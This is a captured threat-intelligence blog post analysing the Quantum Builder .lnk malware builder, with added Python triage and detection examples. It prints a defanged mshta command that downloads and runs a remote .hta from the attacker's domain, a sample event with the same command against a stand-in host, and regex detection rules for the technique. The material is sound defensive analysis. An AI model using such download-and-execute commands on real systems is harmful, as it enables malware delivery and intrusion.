Submitted URL: https://blog.cyble.com/2022/06/22/quantum-software-lnk-file-based-builders-growing-in-popularity/
Effective URL: https://cyble.com/blog/quantum-software-lnk-file-based-builders-growing-in-popularity/
Submission: On November 11 via api from IN — Scanned from DE
QUANTUM SOFTWARE:  LNK FILE-BASED BUILDERS GROWING IN POPULARITY

June 22, 2022



POSSIBLY ASSOCIATED WITH LAZARUS APT GROUP



Cyble Research Labs has been continuously tracking emerging threats and their
delivery mechanisms. We have observed a surge in the use of .lnk files by
various malware families. Some of the prevalent malware families that have
recently used .lnk files for payload delivery are:

 * Emotet
 * Bumblebee
 * Qbot
 * Icedid

Additionally, we have seen many APT instances where the Threat Actors (TAs)
leverage .lnk files for their initial execution to deliver the payload.


.lnk files are shortcut files that reference other files, folders, or
applications in order to open them. TAs leverage .lnk files to drop malicious
payloads using LOLBins. LOLBins (Living off the Land Binaries) are binaries
native to the operating system, such as PowerShell and mshta. TAs use these
binaries to evade detection mechanisms because the operating system trusts
them.

During our OSINT (Open Source Intelligence) activity, Cyble Research Labs came
across a new .lnk builder dubbed “Quantum Software/Quantum Builder.” Figure 1
shows a post made by the Threat Actor on a cybercrime forum.

Figure 1 – Post made by TA on a cybercrime forum



The TA claims that Quantum Builder can spoof any extension and has over 300
different icons available for malicious .lnk files. Figure 2 shows the pricing
details and functionality of the builder.

Figure 2 – Functionality and pricing details



The TA has created a video demonstrating how to build .lnk, .hta, and .iso files
using the Quantum Builder. The .hta payload can be created using Quantum Builder
by customizing options such as payload URL details, DLL support, UAC Bypass,
execution path and time delay to execute the payload, etc.

Figure 3 – .hta builder



The .lnk builder embeds the generated .hta payload and creates a new .lnk file.
The builder provides various icons as an option while building the .lnk file.
The below figure shows the Quantum .lnk builder.

Figure 4 – .lnk builder



At the end of this process, the .iso builder is used to create the .iso image
containing the .lnk file for further delivery via email and execution.

Figure 5 – .iso builder



The TA has also claimed to have implemented a DogWalk n-day exploit. This
vulnerability exists in the Microsoft Support Diagnostic Tool (MSDT) and could
lead to code execution if the user opens a specially crafted .diagcab file,
typically sent by TAs over email. The .diagcab file then downloads a malicious
file into the Startup folder, which is executed every time the user logs in.

Figure 6 – DogWalk implementation




TECHNICAL ANALYSIS



Further investigation revealed a post shared by the TA, indicating that this
sample might be generated using Quantum Builder.

(SHA256: 2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25).

The figure below shows the post made by the TA regarding the above sample.

Figure 7 – Twitter post linked by TA on a cybercrime forum



The sample mentioned in the above post connects to a domain named
“quantum-software.online”; the same domain was used by the Quantum TA as a demo
site, as shown in the figure below. This indicates that the identified hash was
generated using Quantum Builder.

Figure 8 – Demo site used by TA



This sample is a Windows Shortcut (.lnk) file. By default, Windows hides the
.lnk extension, so if a file is named file_name.txt.lnk, only file_name.txt
will be visible to the user, even if the option to show file extensions is
enabled. For this reason, .lnk files are an attractive disguise or smokescreen
for TAs.
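As an added illustration (not part of Cyble's write-up), the following Python triage helper shows both halves of this point: what Explorer displays for a double-extension name, and how to confirm from a file's bytes that it is a Shell Link regardless of what the name suggests. The header constants come from the MS-SHLLINK specification; the sample file bytes, filenames and the document-extension list are constructed here.

```python
import struct

# Shell Link header (MS-SHLLINK 2.1): HeaderSize is always 0x4C, followed by the
# LinkCLSID 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Inner extensions that read as a harmless document once Explorer hides ".lnk".
DOCUMENT_LIKE = {"txt", "pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "htm", "html"}

# Constructed sample: a minimal header that an LNK parser would accept. The
# remaining header fields are zero because only the first 20 bytes matter here.
SAMPLE_LNK = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + b"\x00" * (LNK_HEADER_SIZE - 20)


def display_name(filename):
    """What Explorer shows for a shortcut: the trailing .lnk is suppressed."""
    return filename[:-4] if filename.lower().endswith(".lnk") else filename


def is_lnk(data):
    """Identify a Shell Link by content (HeaderSize + LinkCLSID), not by name."""
    if len(data) < 20:
        return False
    return struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE and data[4:20] == LNK_CLSID


def is_deceptive_name(filename):
    """True for names like file_name.txt.lnk whose visible part is a document extension."""
    parts = filename.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[2] == "lnk" and parts[1] in DOCUMENT_LIKE


def triage(filename, data):
    """Return 'deceptive-lnk', 'lnk' or 'not-lnk' for one file taken from an attachment or ISO."""
    if not is_lnk(data):
        return "not-lnk"
    return "deceptive-lnk" if is_deceptive_name(filename) else "lnk"


if __name__ == "__main__":
    samples = [("invoice.txt.lnk", SAMPLE_LNK), ("readme.lnk", SAMPLE_LNK), ("notes.txt", b"plain text")]
    for name, blob in samples:
        print(f"{name:18} shown as {display_name(name):16} -> {triage(name, blob)}")
```

The content check matters more than the name check: mail gateways and ISO unpackers see the real file name, but a user only sees the display name, so a scanner should alert when the two disagree about what the file is.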

Figure 9 – File details



Upon execution, the .lnk file runs malicious PowerShell code, which uses mshta
to execute a .hta file hosted on a remote site.

This script uses a function that deobfuscates the malicious PowerShell script.
The function performs a mathematical operation that converts numeric values
into characters. The figure below shows the deobfuscated data.

Figure 10 – De-obfuscated data



Command: "C:\Windows\system32\mshta.exe" hxxps[:]//quantum-software[.]online/remote/bdg[.]hta

The infection chain is represented below.

Figure 11 – Infection Chain
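An added detection example, not from the original post: a small Python scanner that runs over constructed process-creation events (Sysmon Event ID 1 field names) and flags the two observable steps of the chain above, a script host launched from Explorer with a hidden window, which is what a double-clicked .lnk produces, and mshta.exe either passed a remote .hta URL or spawned by a script host. The hostname, paths and command lines in the sample events are made up.

```python
import json
import re
from pathlib import PureWindowsPath

# Constructed process-creation events using Sysmon Event ID 1 field names.
# Hostname, paths and command lines are invented for this example.
SAMPLE_EVENTS = [
    json.dumps({"Image": r"C:\Windows\explorer.exe",
                "ParentImage": r"C:\Windows\System32\userinit.exe",
                "CommandLine": "explorer.exe"}),
    json.dumps({"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": "powershell.exe -WindowStyle Hidden -NoProfile -Command <decoder stub>"}),
    json.dumps({"Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": '"C:\\Windows\\system32\\mshta.exe" https://lnk-demo.example/remote/payload.hta'}),
    json.dumps({"Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": '"C:\\Windows\\system32\\mshta.exe" "C:\\Program Files\\Vendor\\setup.hta"'}),
]

REMOTE_HTA = re.compile(r"https?://[^\s\"']+\.hta\b", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def basename(path):
    """Lower-cased file name of a Windows path, so rules are path-independent."""
    return PureWindowsPath(path).name.lower()


def evaluate(event):
    """Return the list of findings for one event (empty when nothing matches)."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    findings = []
    # Step 1 of the chain: the double-clicked .lnk makes Explorer start the script host.
    if image in SCRIPT_HOSTS and parent == "explorer.exe" and HIDDEN_WINDOW.search(cmd):
        findings.append("script host launched from explorer.exe with a hidden window")
    # Step 2: mshta.exe used as a proxy (T1218) to run a remotely hosted .hta.
    if image == "mshta.exe" and REMOTE_HTA.search(cmd):
        findings.append("mshta.exe executing a remote .hta")
    if image == "mshta.exe" and parent in SCRIPT_HOSTS:
        findings.append("mshta.exe spawned by a script host")
    return findings


def scan(lines):
    """Run every JSON event through evaluate(); return (index, findings) for those that fire."""
    alerts = []
    for idx, line in enumerate(lines):
        findings = evaluate(json.loads(line))
        if findings:
            alerts.append((idx, findings))
    return alerts


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(findings))
```

The local-installer event (index 3) stays quiet on purpose: mshta.exe running a file from Program Files under Explorer is ordinary, while a remote URL argument or a script-host parent is not. Explorer starting PowerShell is also common on its own, so the hidden-window condition is what keeps the first rule from paging on every administrator shortcut.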


POSSIBLE LINKS TO LAZARUS APT



In recent samples and research on Lazarus APT, we observed TAs using .lnk
files to deliver further-stage payloads. Upon comparing both scripts, we found
that the deobfuscation loop and the initialization of variables were the same,
indicating a possible connection between Quantum Builder and the Lazarus APT
group.

Figure 12 – Similar PowerShell script




CONCLUSION



We have observed a steadily increasing number of high-profile TAs shifting back
to .lnk files to deliver their payloads. TAs typically use LOLBins in such
infection mechanisms because they make malicious activity significantly harder
to detect.

The recently discovered MSDT zero-day vulnerability also exploited a LOLBin.
Within a short window of this incident first being observed in the wild, TAs
have leveraged the vulnerability through different attack vectors.

The TA behind Quantum Builder appears to be updating the malicious tool with new
attack techniques, making it more attractive to other TAs. We will likely see
more usage of such tools in the near future.


OUR RECOMMENDATIONS



We have listed some essential cybersecurity best practices that create the first
line of control against attackers. We recommend that our readers follow the best
practices given below:

 * Refrain from opening untrusted links and email attachments without verifying
   their authenticity.
 * Use strong passwords and enforce multi-factor authentication wherever
   possible.
 * Verify the source of files before executing them.
 * Turn on the automatic software update feature on your computer, mobile, and
   other connected devices wherever possible and pragmatic.
 * Use a reputed anti-virus and Internet security software package on your
   connected devices, including PC, laptop, and mobile.
 * Conduct regular backup practices and keep those backups offline or in a
   separate network.


MITRE ATT&CK® TECHNIQUES



Tactic             Technique ID   Technique Name
Initial Access     T1566          Phishing
Execution          T1204          User Execution
Execution          T1059          Command and Scripting Interpreter
Defense Evasion    T1218          System Binary Proxy Execution
Defense Evasion    T1140          Deobfuscate/Decode Files or Information


INDICATORS OF COMPROMISE (IOCS)



Indicators                                                          Indicator Type   Description
04e8a5c6e5797b0f436ca36452170a2f                                    MD5              .lnk file
924be824edb54f917d52e43a551c0eb2848cad8f                            SHA-1            .lnk file
2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25    SHA-256          .lnk file
hxxps[:]//quantum-software[.]online/remote/bdg[.]hta                Domain           Malicious Domain
52b0b06ab4cf6c6b1a13d8eec2705e3b                                    MD5              Lazarus .lnk file
dfdde88da020e584038d2656d0e3d48cfae27b1a                            SHA-1            Lazarus .lnk file
b9899082824f1273e53cbf1d455f3608489388672d20b407338ffeecefc248f1    SHA-256          Lazarus .lnk file

